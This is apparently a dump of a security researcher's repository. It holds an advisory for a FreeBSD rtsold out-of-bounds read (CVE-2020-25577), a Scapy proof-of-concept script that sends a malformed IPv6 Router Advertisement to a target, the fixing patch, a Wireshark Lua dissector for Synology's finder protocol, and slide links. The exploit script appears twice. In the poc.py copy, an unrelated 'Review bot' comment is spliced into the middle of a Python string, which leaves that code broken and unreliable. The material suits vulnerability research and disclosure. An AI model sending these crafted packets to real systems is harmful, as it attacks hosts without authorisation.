sizeof(ntopbuf)) == NULL) { 55 | 380 warnmsg(LOG_INFO, __func__, 56 | 381 "an invalid address in RDNSS option" 57 | 382 " in RA from %s was ignored.", 58 | 383 inet_ntop(AF_INET6, &from.sin6_addr, 59 | 384 ntopbuf, sizeof(ntopbuf))); 60 | 385 addr++; 61 | 386 continue; 62 | 387 } 63 | [...] 
436                 addr++;
437             }
```

### Proof of Concept

The following code, based on `Scapy`, provides a proof of concept for the bug described above. It was tested against `FreeBSD 12.2-RELEASE-p3`.

```python
import string
from scapy.layers.inet6 import IPv6, ICMPv6ND_RA, ICMPv6NDOptDNSSL, ByteField, ShortField, IntField, StrField
from scapy.all import send, Packet

class MyICMPv6NDOptRDNSS(Packet):
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [ByteField("type", 25),
                   ByteField("len", 4),  # 4 * 8 = 32 bytes: an even length the old check accepts
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   StrField("dns", "AAAAAAAAAAAAAAAABBBBBBBB")  # one 16-byte address plus 8 leftover bytes
                   ]

def rdnss_oob_read(target_addr):
    def build_domain_name(name_len):
        CHUNKS = name_len // 0x3f
        subdomains = []
        for i in range(CHUNKS):
            subdomains.append(string.ascii_lowercase[i] * 0x3f)
        domain = '.'.join(subdomains)
        print('final len(domain) :{}'.format(len(domain)))
        return domain

    ip = IPv6(dst=target_addr, hlim=255)
    ra = ICMPv6ND_RA()
    dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)])
    dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)])
    dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1'*22])

    rdnss = MyICMPv6NDOptRDNSS(lifetime=1)

    pkt = ip/ra/dnssl1/dnssl2/dnssl3/rdnss

    print("total packet len: %d" % (len(pkt)))
    print("total ipv6 len: %d" % (len(ra/dnssl1/dnssl2/dnssl3/rdnss)))
    send(pkt)

def main():
    target_addr = "fe80::20c:29ff:fed1:1999"
    rdnss_oob_read(target_addr)

if __name__ == '__main__':
    main()
```

### Patch

It has been fixed in this [commit](https://cgit.freebsd.org/src/commit/?id=1af332a7d8f86b6fcc1f0f575fe5b06021b54f4c) as follows.

```diff
diff --git a/usr.sbin/rtsold/rtsol.c b/usr.sbin/rtsold/rtsol.c
index 30027fc65ac9..76756bfd8393 100644
--- a/usr.sbin/rtsold/rtsol.c
+++ b/usr.sbin/rtsold/rtsol.c
@@ -363,13 +363,19 @@ rtsol_input(int sock)
 case ND_OPT_RDNSS:
 rdnss = (struct nd_opt_rdnss *)raoptp;
 
- /* Optlen sanity check (Section 5.3.1 in RFC 6106) */
- if (rdnss->nd_opt_rdnss_len < 3) {
+ /*
+ * The option header is 8 bytes long and each address
+ * occupies 16 bytes, so the option length must be
+ * greater than or equal to 24 bytes and an odd multiple
+ * of 8 bytes. See section 5.1 in RFC 6106.
+ */
+ if (rdnss->nd_opt_rdnss_len < 3 ||
+ rdnss->nd_opt_rdnss_len % 2 == 0) {
 warnmsg(LOG_INFO, __func__,
- "too short RDNSS option"
- "in RA from %s was ignored.",
- inet_ntop(AF_INET6, &from.sin6_addr,
- ntopbuf, sizeof(ntopbuf)));
+ "too short RDNSS option in RA from %s "
+ "was ignored.",
+ inet_ntop(AF_INET6, &from.sin6_addr, ntopbuf,
+ sizeof(ntopbuf)));
 break;
 }
```

### Reference

+ [Bad Neighbor on FreeBSD: IPv6 Router Advertisement Vulnerabilities in rtsold (CVE-2020-25577)](https://blog.quarkslab.com/bad-neighbor-on-freebsd-ipv6-router-advertisement-vulnerabilities-in-rtsold-cve-2020-25577.html)
+ [Multiple vulnerabilities in rtsold](https://www.freebsd.org/security/advisories/FreeBSD-SA-20:32.rtsold.asc)
+ [Neighbor Discovery Protocol](https://en.wikipedia.org/wiki/Neighbor_Discovery_Protocol)
+ [rtsold: Fix validation of RDNSS options](https://cgit.freebsd.org/src/commit/?id=1af332a7d8f86b6fcc1f0f575fe5b06021b54f4c)

--------------------------------------------------------------------------------
/advisory/Other/freebsd_rtsold_out_of_bounds_read/poc.py:
--------------------------------------------------------------------------------
import string
from scapy.layers.inet6 import IPv6, ICMPv6ND_RA, ICMPv6NDOptDNSSL, ByteField, ShortField, IntField, StrField
from scapy.all import send, Packet

class MyICMPv6NDOptRDNSS(Packet):
    name = ("ICMPv6 "
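Review bot: the warning in the `+` lines still reads "too short RDNSS option in RA from %s was ignored." although the new condition `rdnss->nd_opt_rdnss_len % 2 == 0` also rejects options that are long enough but even-sized (the `Length=4` case this advisory describes), so the log line misdescribes what was dropped; log the offending length instead, for example "invalid RDNSS option length %u in RA from %s was ignored.", so a truncated option can be told apart from a malformed one during triage. The rule itself matches the new comment: an 8-byte header plus 16-byte addresses gives 24 + 16k bytes, i.e. an odd length of at least 3 units. Also, the hunk header announces 13 old and 19 new lines but 12 and 18 are shown, so one trailing context line was probably lost when the diff was pasted into this README.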
            "Neighbor Discovery Option - Recursive DNS Server Option")
    fields_desc = [ByteField("type", 25),
                   ByteField("len", 4),  # 4 * 8 = 32 bytes: an even length the old check accepts
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   StrField("dns", "AAAAAAAAAAAAAAAABBBBBBBB")  # one 16-byte address plus 8 leftover bytes
                   ]

def rdnss_oob_read(target_addr):
    def build_domain_name(name_len):
        CHUNKS = name_len // 0x3f
        subdomains = []
        for i in range(CHUNKS):
            subdomains.append(string.ascii_lowercase[i] * 0x3f)
        domain = '.'.join(subdomains)
        print('final len(domain) :{}'.format(len(domain)))
        return domain

    ip = IPv6(dst=target_addr, hlim=255)
    ra = ICMPv6ND_RA()
    dnssl1 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(1024)])
    dnssl2 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=[build_domain_name(375)])
    dnssl3 = ICMPv6NDOptDNSSL(lifetime=1, searchlist=['1'*22])

    rdnss = MyICMPv6NDOptRDNSS(lifetime=1)

    pkt = ip/ra/dnssl1/dnssl2/dnssl3/rdnss

    print("total packet len: %d" % (len(pkt)))
    print("total ipv6 len: %d" % (len(ra/dnssl1/dnssl2/dnssl3/rdnss)))
    send(pkt)

def main():
    target_addr = "fe80::20c:29ff:fed1:1999"
    rdnss_oob_read(target_addr)

if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/scripts/Synology/syno_finder/README.md:
--------------------------------------------------------------------------------
### Wireshark Plugins

#### syno_finder

A plugin to dissect the Synology finder protocol (`9999/udp`).


--------------------------------------------------------------------------------
/scripts/Synology/syno_finder/images/syno_finder_sample.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/scripts/Synology/syno_finder/images/syno_finder_sample.png
--------------------------------------------------------------------------------
/scripts/Synology/syno_finder/syno_finder.lua:
--------------------------------------------------------------------------------
-- @brief Synology Finder Protocol (9999/udp) Dissector Plugin
-- @author cq674350529

-- reference:
-- 1) https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html
-- 2) https://github.com/wireshark/wireshark/blob/master/epan/dissectors/packet-cdp.c
-- 3) https://www.wireshark.org/docs/wsdg_html_chunked/wslua_dissector_example.html
-- 4) https://www.wireshark.org/docs/wsdg_html_chunked/wsluarm_modules.html

local synoFinderProtocol = Proto("SynoFinder", "Synology Finder Protocol")
local protoName = "syno_finder"


local magic = ProtoField.bytes(protoName .. ".magic", "Magic", base.SPACE)

-- subtree header
local tlv = ProtoField.bytes(protoName .. ".tlv", "TLV") -- only used to group type, length and value

local length = ProtoField.uint8(protoName .. ".length", "Length")
local value = ProtoField.bytes(protoName .. ".value", "Value")

-- specific value fields
local packetType = ProtoField.uint32(protoName .. ".packet_type", "Packet Type", base.HEX)
local serverName = ProtoField.string(protoName .. ".server_name", "Server Name")
local ipAddress = ProtoField.ipv4(protoName .. ".ip_address", "IP")
local ipMask = ProtoField.ipv4(protoName .. ".subnet_mask", "Subnet Mask")
local dns = ProtoField.ipv4(protoName .. ".dns", "DNS")
local macAddress = ProtoField.string(protoName .. ".mac_address", "Mac Address")
local ipGateway = ProtoField.ipv4(protoName .. ".gateway", "Gateway")
local packetSubtype = ProtoField.uint32(protoName .. ".packet_subtype", "Packet Subtype", base.HEX)
local password = ProtoField.string(protoName .. ".password", "Password")
local buildNum = ProtoField.uint32(protoName .. ".build_num", "Build Num")
local unique = ProtoField.string(protoName .. ".unique", "Unique")
local supportRaid = ProtoField.uint32(protoName .. ".support_raid", "Support Raid")
local port = ProtoField.uint32(protoName .. ".port", "Port")
local sslPort = ProtoField.uint32(protoName .. ".ssl_port", "Ssl Port")
local username = ProtoField.string(protoName .. ".username", "Username")
local shareFolder = ProtoField.string(protoName .. ".share_folder", "Share Folder")
local productVersion = ProtoField.string(protoName .. ".product_version", "Product Version")
local model = ProtoField.string(protoName .. ".model", "Model")
local memtestErrorCode = ProtoField.uint32(protoName .. ".memtest_error_code", "Memtest Error Code", base.HEX)
local smallFixNum = ProtoField.uint32(protoName .. ".small_fix_num", "Small Fix Num")
local serialNum = ProtoField.string(protoName .. ".serial_num", "Serial Num")
local osName = ProtoField.string(protoName .. ".os_name", "Os Name")
local supportOnsiteTool = ProtoField.string(protoName .. ".support_onsite_tool", "Support Onsite Tool")
local publicKey = ProtoField.string(protoName .. ".public_key", "Public Key")
local randomBytes = ProtoField.uint32(protoName .. ".random_bytes", "Random Bytes", base.HEX)

local value8 = ProtoField.uint8(protoName .. ".value", "Value", base.HEX)
local value16 = ProtoField.uint16(protoName .. ".value", "Value", base.HEX)
local value32 = ProtoField.uint32(protoName .. ".value", "Value", base.HEX)

local typeFields = {
    [0x1] = packetType,
    [0x11] = serverName,
    [0x12] = ipAddress,
    [0x13] = ipMask,
    [0x14] = dns,
    [0x15] = dns,
    [0x19] = macAddress,
    [0x1e] = ipGateway,
    [0x20] = packetSubtype,
    [0x21] = serverName,
    [0x29] = macAddress,
    [0x2a] = password,
    [0x49] = buildNum,
    [0x4a] = username,
    [0x4b] = shareFolder,
    [0x70] = unique,
    [0x71] = supportRaid,
    [0x73] = serialNum,
    [0x75] = port,
    [0x76] = sslPort,
    [0x77] = productVersion,
    [0x78] = model,
    [0x79] = memtestErrorCode,
    [0x7c] = macAddress,
    [0x90] = smallFixNum,
    [0xc0] = serialNum,
    [0xc1] = osName,
    [0xc3] = supportOnsiteTool,
    [0xc4] = publicKey,
    [0xc5] = randomBytes
}

-- reference: https://stackoverflow.com/questions/52012229/how-do-you-access-name-of-a-protofield-after-declaration
function getFieldName(field)
    local fieldString = tostring(field)
    local i, j = string.find(fieldString, ": .* " .. protoName)
    return string.sub(fieldString, i + 2, j - (1 + string.len(protoName)))
end

-- generate typeNames
local typeNames = {}
for tlvType, itemField in pairs(typeFields) do
    typeNames[tlvType] = getFieldName(itemField)
end

local type = ProtoField.uint8(protoName .. ".type", "Type", base.HEX, typeNames)


-- display in subtree header
-- reference:
-- 1) https://gist.github.com/FreeBirdLjj/6303864
-- 2) https://blog.csdn.net/humanxing/article/details/42318213
function format_uint_le(value)
    return value:le_uint()
end

function format_uint_hex(value)
    return string.format("%#x", value:le_uint())
end

function format_uint_bool(value)
    local bool_value = "False"
    if value:le_uint() ~= 0 then
        bool_value = "True"
    end
    return bool_value
end

function format_string(value)
    return value:string()
end

function format_ipv4(value)
    return value:ipv4()
end

local typeFormats = {
    [0x1] = format_uint_hex,
    [0x11] = format_string,
    [0x12] = format_ipv4, -- Address object
    [0x13] = format_ipv4,
    [0x14] = format_ipv4,
    [0x15] = format_ipv4,
    [0x19] = format_string,
    [0x1e] = format_ipv4,
    [0x20] = format_uint_hex,
    [0x21] = format_string,
    [0x29] = format_string,
    [0x2a] = format_string,
    [0x49] = format_uint_le,
    [0x4a] = format_string,
    [0x4b] = format_string,
    [0x70] = format_string,
    [0x71] = format_uint_bool,
    [0x73] = format_string,
    [0x75] = format_uint_le,
    [0x76] = format_uint_le,
    [0x77] = format_string,
    [0x78] = format_string,
    [0x79] = format_uint_hex,
    [0x7c] = format_string,
    [0x90] = format_uint_le,
    [0xc0] = format_string,
    [0xc1] = format_string,
    [0xc3] = format_uint_bool,
    [0xc4] = format_string,
    [0xc5] = format_uint_hex
}

-- register fields
synoFinderProtocol.fields = {
    magic,
    tlv, type, length, value, -- tlv
    packetType, serverName, ipAddress, ipMask, ipGateway, macAddress, dns, packetSubtype, password, buildNum, unique, supportRaid, username, shareFolder, port,
    sslPort, productVersion, model, memtestErrorCode, smallFixNum, serialNum, osName, supportOnsiteTool, publicKey, randomBytes, -- specific value fields
    value8, value16, value32 -- general value fields
}

function getFieldType(field)
    local fieldString = tostring(field)
    local i, j = string.find(fieldString, "ftypes.* " .. "base")
    return string.sub(fieldString, i + 7, j - (1 + string.len("base")))
end

function getFieldByType(type, length)
    local tmp_field = typeFields[type]
    if(tmp_field) then
        return tmp_field -- specific value field
    else
        if length == 4 then -- general value field
            return value32
        elseif length == 2 then
            return value16
        elseif length == 1 then
            return value8
        else
            return value
        end
    end
end

function formatValue(type, value)
    local tmp_func = typeFormats[type]
    if(tmp_func) then
        return tmp_func(value)
    else
        return ""
    end
end

-- reference: https://gist.github.com/yi/01e3ab762838d567e65d
function string_fromhex(str)
    return (str:gsub('..', function (cc)
        return string.char(tonumber(cc, 16))
    end))
end

function synoFinderProtocol.dissector(buffer, pinfo, tree)
    -- (buffer: type Tvb, pinfo: type Pinfo, tree: type TreeItem)
    local buffer_length = buffer:len()
    -- anything shorter than the 8-byte magic cannot be this protocol
    if buffer_length < 8 then return end

    -- "\x12\x34\x55\x66SYNO" marks an encrypted payload, "\x12\x34\x56\x78SYNO" plain TLVs
    local magicValue = buffer(0, 8):string()
    local isEncrypt = 0
    if magicValue == string_fromhex("1234556653594e4f") then
        isEncrypt = 1
    elseif magicValue ~= string_fromhex("1234567853594e4f") then
        return
    end

    pinfo.cols.protocol = synoFinderProtocol.name

    local subtree = tree:add(synoFinderProtocol, buffer(), "Synology Finder Protocol")
    subtree:add_le(magic, buffer(0, 8))

    local offset = 0
    local payloadStart = 8
    if isEncrypt == 1 then
        -- just shows the raw encrypted data
        Dissector.get("data"):call(buffer(payloadStart+offset):tvb(), pinfo, subtree)
    else
        while payloadStart + offset < buffer_length do
            -- a truncated TLV (header or value running past the end of the packet)
            -- ends the walk instead of raising a Lua error; the leftover bytes are
            -- handed to the data dissector below
            if payloadStart + offset + 2 > buffer_length then break end
            local tlvType = buffer(payloadStart + offset, 1):uint()
            local tlvLength = buffer(payloadStart + offset + 1, 1):uint()
            if payloadStart + offset + 2 + tlvLength > buffer_length then break end
            local valueContent = buffer(payloadStart + offset + 2, tlvLength)
            local tlvField = getFieldByType(tlvType, tlvLength)
            local fieldName = getFieldName(tlvField)
            local description
            if fieldName == "Value" then
                description = "TLV (type" .. ":" .. string.format("0x%x", tlvType) .. ")"
            else
                description = fieldName .. ": " .. tostring(formatValue(tlvType, valueContent))
            end

            -- reference: https://osqa-ask.wireshark.org/questions/42404/lua-dissector-tree-collapse/
            -- local tlvSubtree = subtree:add(synoFinderProtocol, buffer(payloadStart+offset, tlvLength+2), description)
            local tlvSubtree = subtree:add(tlv, buffer(payloadStart+offset, tlvLength+2)):set_text(description)
            tlvSubtree:add_le(type, buffer(payloadStart + offset, 1))
            tlvSubtree:add_le(length, buffer(payloadStart + offset + 1, 1))
            if tlvLength > 0 then
                local fieldType = getFieldType(tlvField)
                if string.find(fieldType, "^IP") == 1 then
                    -- starts with "IP"
                    tlvSubtree:add(tlvField, buffer(payloadStart + offset + 2, tlvLength))
                else
                    tlvSubtree:add_le(tlvField, buffer(payloadStart + offset + 2, tlvLength))
                end
            end

            offset = offset + 2 + tlvLength
        end

        if payloadStart + offset ~= buffer_length then
            -- fallback dissector that just shows the raw data
            Dissector.get("data"):call(buffer(payloadStart+offset):tvb(), pinfo, tree)
        end
    end
end

local udp_port = DissectorTable.get("udp.port")
udp_port:add(9999, synoFinderProtocol) -- udp broadcast port

--------------------------------------------------------------------------------
/scripts/Synology/syno_finder/synology_finder.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/scripts/Synology/syno_finder/synology_finder.pcap
--------------------------------------------------------------------------------
/slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/EU-22-Chen-LCDPwn-Breaking-Enterprise.pdf
--------------------------------------------------------------------------------
/slides/EU-23-Quan-Breaking-Theoretical-Limits.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/EU-23-Quan-Breaking-Theoretical-Limits.pdf
--------------------------------------------------------------------------------
/slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/HITB2021AMS-A_Journey_into_Synology_NAS.pdf
--------------------------------------------------------------------------------
/slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/POC2019-Bug_Hunting_in_Synology_NAS.pdf
--------------------------------------------------------------------------------
/slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/slides/POC2022-MikroTik_RouterOS_Security-The_Forgotten_IPC_Message.pdf
--------------------------------------------------------------------------------